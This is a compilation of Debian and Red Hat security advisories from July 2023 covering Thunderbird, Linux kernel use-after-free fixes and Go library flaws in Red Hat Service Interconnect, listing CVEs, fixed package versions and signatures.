Debian Linux Security Advisory 5451-1 - Multiple security issues were discovered in Thunderbird, which could result in denial of service or the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5451-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
July 09, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : thunderbird  
CVE ID         : CVE-2023-37201 CVE-2023-37202 CVE-2023-37207  
                 CVE-2023-37208 CVE-2023-37211  
Debian Bug     : 971790 1006432

Multiple security issues were discovered in Thunderbird, which could  
result in denial of service or the execution of arbitrary code.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 1:102.13.0-1~deb11u1.

For the stable distribution (bookworm), this problem has been fixed in  
version 1:102.13.0-1~deb12u1.

We recommend that you upgrade your thunderbird packages.

For the detailed security status of thunderbird please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/thunderbird

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmSq/IEACgkQEMKTtsN8  
TjbbzA//RGC3Tj6WRrccthY5Uxh30CLYzuGvJmlwzd4iH80/8cXZi4dbPu0bSFnP  
wA6qjtNxxeCFcc711699O9LqVGQUBzyK23hp012yHtPb4zjnWwkhZ7FqyZCvgx9d  
H06rtsuOAr2PBlS4bcW3NQy9fH1xMom/+blW6L4IejQ3jXJXmT6B/xZxo0aj39bE  
qNZXxtBWLdiIzVDjXbR7TMT9J+UkvTxyNTXKjf6d3u34LfEIfiHHE8vfZB+JCwwn  
17I8/nsecJglQHXpIu7dNfDNqLmLJPrceBl1R3XMHmA3uQLqQMypT5nsPdWpiMOW  
kOvgmE6jrUUcR7mgQsTcxqD6B5QEztEvOpaRrA7MB5geWewd8E4deksvGwv5Tr9R  
coBM2lzbLRrnbcki83qTjNX8D7B7Urs+uU3YIp/TNSwmaiLIXgwxu7CyzLUif6+7  
+n3GPSMski64qc6WJ0cPajQAmdX2pwtWmyYne5mcKpC3iujj/fQTpZ+Qf5Yuhs/K  
jAd+xqwOXpbEMrCwWBssy92Nj8vWkT2T4vIco1QRxKy3TSBkwubjigZSorKFIx6v  
39a4AeknI0HuH4E3oJ8E6+Um9miptZB4jswlRSRDay7H1AX6bVfs1Bi0L1pozNG6  
lfcugCF+TPFaLRBcBEK3dD4ch47x98rE9bOEZr2ITT2JuP+A1cE=  
=SqjJ  
-----END PGP SIGNATURE-----

Debian Security Advisory 5451-1

Red Hat Security Advisory 2023-4020-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include double free and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:4020-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4020  
Issue date:        2023-07-11  
CVE Names:         CVE-2022-3564   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.4  
Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.4) - noarch, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.4) - x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: use-after-free caused by l2cap_reassemble_sdu() in  
net/bluetooth/l2cap_core.c (CVE-2022-3564)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* The iscsi target deadlocks when the same host acts as an initiator to  
itself (i.e. connects via 127.0.0.1) (BZ#2184012)

* Double free issue in filelayout_alloc_commit_info (BZ#2212887)

* RHEL 7.2 XFS inode cluster corruption (BZ#2213362)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2150999 - CVE-2022-3564 kernel: use-after-free caused by l2cap_reassemble_sdu() in net/bluetooth/l2cap_core.c

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.4):

Source:  
kernel-3.10.0-693.111.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-693.111.1.el7.noarch.rpm  
kernel-doc-3.10.0-693.111.1.el7.noarch.rpm

x86_64:  
kernel-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-debug-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-devel-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-headers-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-tools-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-693.111.1.el7.x86_64.rpm  
perf-3.10.0-693.111.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
python-perf-3.10.0-693.111.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.4):

x86_64:  
kernel-debug-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-693.111.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-693.111.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkrSWvAAoJENzjgjWX9erEy64P+weB8xLhnEvx9mRrw8Xe4dVo  
7iPtsiZ6Dh/iN3/R4S7QvtccvGGjSCtGSoHwWbK/1idY0q3h137lBDyZmcbNWNNG  
GBXLQ8vFrRwLBi/t1ksbgZ0s5J+05wSMArkZTG8Omp9jtsI4SvBmeioM+YrAeWRg  
JAhd6J6pJe0Nwc41s5s3f3xiepjYnXXyWhYFadFeslPjoE+otngtCMYkwrzCfMCz  
iG9pPBaT7PC9b994AYct9E4zjJrhOl8S/59y41cxFtNruLtaixvhNVHewkcGyLVP  
6RZ/vg9RM+GbHfxMVlU0bGbdcHa0Nn0hPU2cqF0ynvUpDEKEHF6ZeZvwpeaJqY98  
2nfLwRgM17yJSkDrixoP1E4fgQTQ8WngeImkyhlZHrGh+C5nJlIMIm7xK3ZK/UUx  
Tx1l7TsRA/q/S7l4wsIe/WVwcJ3i9QacJsTkb/ZNK1ZC+BhRwImgTgVEJEe0vZLI  
JUm+WuAsGDiJ3C7X1lLQT0Nb1kNFJAoqrVGqio/an+WphZbq7a0+CM4nMR+p7A5r  
fylgdagozRgC1Gm3c30QqbPIF3+M7tn9V4mbWUmaIUVEkAC0SlTjcFrHO6iiCBW2  
OPTMYpUTnh7kS8QY9vutgxuwfaxI/IZUl2W2c8FPaSQclUJBtt83vjbMowG2Vk4S  
JTIRgcMerL6RbvC0d9b9  
=HymQ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4020-01

Red Hat Security Advisory 2023-4022-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include double free, privilege escalation, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:4022-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4022  
Issue date:        2023-07-11  
CVE Names:         CVE-2022-2588   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.7  
Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update  
Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.7) - noarch, x86_64  
Red Hat Enterprise Linux Server E4S (v. 7.7) - noarch, ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server Optional E4S (v. 7.7) - ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server TUS (v. 7.7) - noarch, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: a use-after-free in cls_route filter implementation may lead to  
privilege escalation (CVE-2022-2588)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* The iscsi target deadlocks when the same host acts as an initiator to  
itself (i.e. connects via 127.0.0.1) (BZ#2183540)

* Double free issue in filelayout_alloc_commit_info (BZ#2212868)

* RHEL 7.2: XFS inode cluster corruption (BZ#2213360)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2114849 - CVE-2022-2588 kernel: a use-after-free in cls_route filter implementation may lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.7):

Source:  
kernel-3.10.0-1062.76.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.76.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.76.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.76.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kernel-3.10.0-1062.76.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.76.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.76.1.el7.noarch.rpm

ppc64le:  
bpftool-3.10.0-1062.76.1.el7.ppc64le.rpm  
bpftool-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-bootwrapper-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debug-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-devel-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-headers-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-tools-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-tools-libs-3.10.0-1062.76.1.el7.ppc64le.rpm  
perf-3.10.0-1062.76.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
python-perf-3.10.0-1062.76.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm

x86_64:  
bpftool-3.10.0-1062.76.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.7):

Source:  
kernel-3.10.0-1062.76.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.76.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.76.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.76.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.7):

ppc64le:  
bpftool-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debug-devel-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
kernel-tools-libs-devel-3.10.0-1062.76.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.ppc64le.rpm

x86_64:  
bpftool-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.7):

x86_64:  
bpftool-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-1062.76.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.76.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2588  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkrSWdAAoJENzjgjWX9erEM3UP/Rf674dWIw9YaCZxiPbOoEJY  
0fimAliiJFaLpm2yK2Uff/33t0XEjbyh83X65+DzOzZH+5xvBJgpz7iMcqqc5pYo  
Hch2DPBCEl9fVY9lwT2SWOOWou3YMenV5fxTQ4PoDsSP7EMTqa/kt46nlOrnTb5c  
d7fhMpyc9zHetYpYrROeJ6GlvGDTSDIpom+WceakyymDPNxiwC9CjpdIwNu1P5x/  
APx6ruj2VRqeQCU9cYmFE4ohY/gs/+u+65cRXojBBxsRD5GKH06/lq7VwI09ELeP  
md2pxIOMdpbpVGUvk4HRePqt90LHGLDgpmB9dZrj6Mf+l3YHXewLvM08aorCya9B  
v/f08dzWEG3gtzDCXuy84yFFGqzF1zWK/F5bKU9JsyYpUN4P4knQkh3WxYCTqc79  
qmu8bFi3vmpapRQGizW0ppDE+wJQI/CmNZLomdDaPANvIeksdjTwGCkc1ralAwv4  
AyNraBVgJw6ncU6mznq6QwcT4ho9Hy6T2YhvSBKoTGj3IsRN2Pl4YrWN12VBw4cK  
/EOApCOPYwwTySNRosWWy9tGc+vv8Ih6X8PgQilLk6j/ruFdohUKBkrPXp+ZZBJ3  
zwPFDtdBvEhVi1puwmgx5JN1Qh3BxmdfSDDDVZcRyyTqjom0Jm3uOBjE4cJzTqu7  
sh0RLAVF6yjVOSTFslnZ  
=y/bj  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4022-01

Red Hat Security Advisory 2023-4003-01 - As a Kubernetes user, I cannot connect easily connect services from one cluster with services on another cluster. Red Hat Application Interconnect enables me to create a service network and it allows geographically distributed services to connect as if they were all running in the same site. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat Service Interconnect 1.4 Release security update  
Advisory ID:       RHSA-2023:4003-01  
Product:           Red Hat Service Interconnect  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4003  
Issue date:        2023-07-10  
CVE Names:         CVE-2022-2879 CVE-2022-2880 CVE-2022-28327   
                   CVE-2022-41715 CVE-2022-41723 CVE-2022-41724   
                   CVE-2022-41725 CVE-2023-24534 CVE-2023-24536   
                   CVE-2023-24537 CVE-2023-24538 CVE-2023-24539   
                   CVE-2023-29400   
=====================================================================

1. Summary:

This is release 1.4 of the rpms for Red Hat Service Interconnect. Red Hat  
Service Interconnect 1.4 introduces a service network, linking TCP and HTTP  
services across the hybrid cloud.  
A service network enables communication between services running in  
different network locations or sites. It allows geographically distributed  
services to connect as if they were all running in the same site.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

8Base-Service-Interconnect-1 - noarch, x86_64  
9Base-Service-Interconnect-1 - noarch, x86_64

3. Description:

As a Kubernetes user, I cannot connect easily connect services from one  
cluster with services on another cluster. Red Hat Application Interconnect  
enables me to create a service network and it allows geographically  
distributed services to connect as if they were all running in the same  
site.

Security Fix(es):

* golang: archive/tar: unbounded memory consumption when reading headers  
(CVE-2022-2879)

* golang: net/http/httputil: ReverseProxy should not forward unparseable  
query parameters (CVE-2022-2880)

* golang: crypto/elliptic: panic caused by oversized scalar  
(CVE-2022-28327)

* golang: regexp/syntax: limit memory used by parsing regexps  
(CVE-2022-41715)

* net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK  
decoding (CVE-2022-41723)

* golang: crypto/tls: large handshake records may cause panics  
(CVE-2022-41724)

* golang: net/http, mime/multipart: denial of service from excessive  
resource consumption (CVE-2022-41725)

* golang: net/http, net/textproto: denial of service from excessive memory  
allocation (CVE-2023-24534)

* golang: net/http, net/textproto, mime/multipart: denial of service from  
excessive resource consumption (CVE-2023-24536)

* golang: go/parser: Infinite loop in parsing (CVE-2023-24537)

* golang: html/template: backticks not treated as string delimiters  
(CVE-2023-24538)

* golang: html/template: improper sanitization of CSS values  
(CVE-2023-24539)

* golang: html/template: improper handling of empty HTML attributes  
(CVE-2023-29400)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar  
2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers  
2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters  
2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps  
2178358 - CVE-2022-41723 net/http, golang.org/x/net/http2: avoid quadratic complexity in HPACK decoding  
2178488 - CVE-2022-41725 golang: net/http, mime/multipart: denial of service from excessive resource consumption  
2178492 - CVE-2022-41724 golang: crypto/tls: large handshake records may cause panics  
2184481 - CVE-2023-24538 golang: html/template: backticks not treated as string delimiters  
2184482 - CVE-2023-24536 golang: net/http, net/textproto, mime/multipart: denial of service from excessive resource consumption  
2184483 - CVE-2023-24534 golang: net/http, net/textproto: denial of service from excessive memory allocation  
2184484 - CVE-2023-24537 golang: go/parser: Infinite loop in parsing  
2196026 - CVE-2023-24539 golang: html/template: improper sanitization of CSS values  
2196029 - CVE-2023-29400 golang: html/template: improper handling of empty HTML attributes

6. Package List:

8Base-Service-Interconnect-1:

Source:  
libwebsockets-4.3.1-1.el8ai.src.rpm  
qpid-proton-0.37.0-2.el8ai.src.rpm  
skupper-cli-1.4.1-2.el8.src.rpm  
skupper-router-2.4.1-2.el8.src.rpm

noarch:  
skupper-router-common-2.4.1-2.el8.noarch.rpm  
skupper-router-docs-2.4.1-2.el8.noarch.rpm  
skupper-router-tools-2.4.1-2.el8.noarch.rpm

x86_64:  
libwebsockets-4.3.1-1.el8ai.x86_64.rpm  
libwebsockets-debuginfo-4.3.1-1.el8ai.x86_64.rpm  
libwebsockets-debugsource-4.3.1-1.el8ai.x86_64.rpm  
libwebsockets-devel-4.3.1-1.el8ai.x86_64.rpm  
python3-qpid-proton-0.37.0-2.el8ai.x86_64.rpm  
python3-qpid-proton-debuginfo-0.37.0-2.el8ai.x86_64.rpm  
qpid-proton-c-0.37.0-2.el8ai.x86_64.rpm  
qpid-proton-c-debuginfo-0.37.0-2.el8ai.x86_64.rpm  
qpid-proton-c-devel-0.37.0-2.el8ai.x86_64.rpm  
qpid-proton-cpp-debuginfo-0.37.0-2.el8ai.x86_64.rpm  
qpid-proton-debuginfo-0.37.0-2.el8ai.x86_64.rpm  
qpid-proton-debugsource-0.37.0-2.el8ai.x86_64.rpm  
rubygem-qpid_proton-debuginfo-0.37.0-2.el8ai.x86_64.rpm  
skupper-cli-1.4.1-2.el8.x86_64.rpm  
skupper-router-2.4.1-2.el8.x86_64.rpm  
skupper-router-debuginfo-2.4.1-2.el8.x86_64.rpm  
skupper-router-debugsource-2.4.1-2.el8.x86_64.rpm

9Base-Service-Interconnect-1:

Source:  
jsoncpp-1.9.4-3.el9.src.rpm  
libwebsockets-4.3.1-1.el9ai.src.rpm  
qpid-proton-0.37.0-2.el9ai.src.rpm  
skupper-cli-1.4.1-2.el9.src.rpm  
skupper-router-2.4.1-2.el9.src.rpm

noarch:  
skupper-router-common-2.4.1-2.el9.noarch.rpm  
skupper-router-docs-2.4.1-2.el9.noarch.rpm  
skupper-router-tools-2.4.1-2.el9.noarch.rpm

x86_64:  
jsoncpp-1.9.4-3.el9.x86_64.rpm  
jsoncpp-debuginfo-1.9.4-3.el9.x86_64.rpm  
jsoncpp-debugsource-1.9.4-3.el9.x86_64.rpm  
jsoncpp-devel-1.9.4-3.el9.x86_64.rpm  
libwebsockets-4.3.1-1.el9ai.x86_64.rpm  
libwebsockets-debuginfo-4.3.1-1.el9ai.x86_64.rpm  
libwebsockets-debugsource-4.3.1-1.el9ai.x86_64.rpm  
libwebsockets-devel-4.3.1-1.el9ai.x86_64.rpm  
python3-qpid-proton-0.37.0-2.el9ai.x86_64.rpm  
python3-qpid-proton-debuginfo-0.37.0-2.el9ai.x86_64.rpm  
qpid-proton-c-0.37.0-2.el9ai.x86_64.rpm  
qpid-proton-c-debuginfo-0.37.0-2.el9ai.x86_64.rpm  
qpid-proton-c-devel-0.37.0-2.el9ai.x86_64.rpm  
qpid-proton-cpp-0.37.0-2.el9ai.x86_64.rpm  
qpid-proton-cpp-debuginfo-0.37.0-2.el9ai.x86_64.rpm  
qpid-proton-cpp-devel-0.37.0-2.el9ai.x86_64.rpm  
qpid-proton-debuginfo-0.37.0-2.el9ai.x86_64.rpm  
qpid-proton-debugsource-0.37.0-2.el9ai.x86_64.rpm  
rubygem-qpid_proton-debuginfo-0.37.0-2.el9ai.x86_64.rpm  
skupper-cli-1.4.1-2.el9.x86_64.rpm  
skupper-router-2.4.1-2.el9.x86_64.rpm  
skupper-router-debuginfo-2.4.1-2.el9.x86_64.rpm  
skupper-router-debugsource-2.4.1-2.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2879  
https://access.redhat.com/security/cve/CVE-2022-2880  
https://access.redhat.com/security/cve/CVE-2022-28327  
https://access.redhat.com/security/cve/CVE-2022-41715  
https://access.redhat.com/security/cve/CVE-2022-41723  
https://access.redhat.com/security/cve/CVE-2022-41724  
https://access.redhat.com/security/cve/CVE-2022-41725  
https://access.redhat.com/security/cve/CVE-2023-24534  
https://access.redhat.com/security/cve/CVE-2023-24536  
https://access.redhat.com/security/cve/CVE-2023-24537  
https://access.redhat.com/security/cve/CVE-2023-24538  
https://access.redhat.com/security/cve/CVE-2023-24539  
https://access.redhat.com/security/cve/CVE-2023-29400  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_service_interconnect

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

